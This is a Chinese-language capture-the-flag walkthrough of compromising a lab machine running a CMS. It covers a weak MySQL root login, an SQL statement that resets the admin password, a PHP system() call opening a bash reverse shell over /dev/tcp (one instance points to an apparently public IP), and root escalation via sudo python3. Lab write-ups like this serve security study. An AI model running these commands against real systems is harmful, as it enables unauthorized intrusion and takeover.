打靶-My cmscms

前言

靶机ip:192.168.0.109

kali IP:192.168.0.106

Goal: Get the root flag of the target.

渗透过程

TScan扫描一下

image-20240808214027142

先看80,好熟悉的界面,以前NKCTF做过,先去看看以前的题,记得当时是个后台文件上传RCE

image-20240808214137758尝试密码无果,去测试一下mysql有没有弱密码

好家伙直接弱密码

image-20240808214715150

1
mysql -uroot -p -h 192.168.0.109 

包意思,中途连sql不知道咋了虚拟机炸了,直接换了一个

image-20240808222348529

fb67c6d24e756229aab021cea7605fb3

本来想直接MD5解密网站偷懒,没想到不行,只能换一种方法了,更改密码

网上应该会有用这个cms忘记密码改密码的过程

image-20240808222745793

果然,直接改为123456

1
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'123456'))) where username = 'admin';

之后再去登录就是之前文件上传RCE了

image-20240808223309712

image-20240808223324418

好了后面尝试了没成功

没权限创建写文件,创建文件夹

后面发现这里可以改配置

image-20240808224045321

1
2
3
system("bash -c 'bash -i>& /dev/tcp/192.168.0.110/9999 0>&1'");
bash -c 'bash -i>& /dev/tcp/140.143.143.130/9999 0>&1'
后面run一下就反弹了

反弹过来就是提权了

先看看什么可用

1
find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image-20240808224626610

发现有个用户armour,其中binary.sh

在当前目录下也就是/var/www/html/admin发现有个隐藏文件

image-20240808225048973

查看发现是TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=

image-20240808225122502

巧了吗不是用户名密码

直接切换用户

armour:Shield@123

切换之后看看sudo -l

image-20240808225605414

这直接python起bash就行了

sudo python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

价格sudo

image-20240808225855813

总结

本来挺简单一个靶场,被我破kali卡了好久,气死了,起的我直接删了,妈的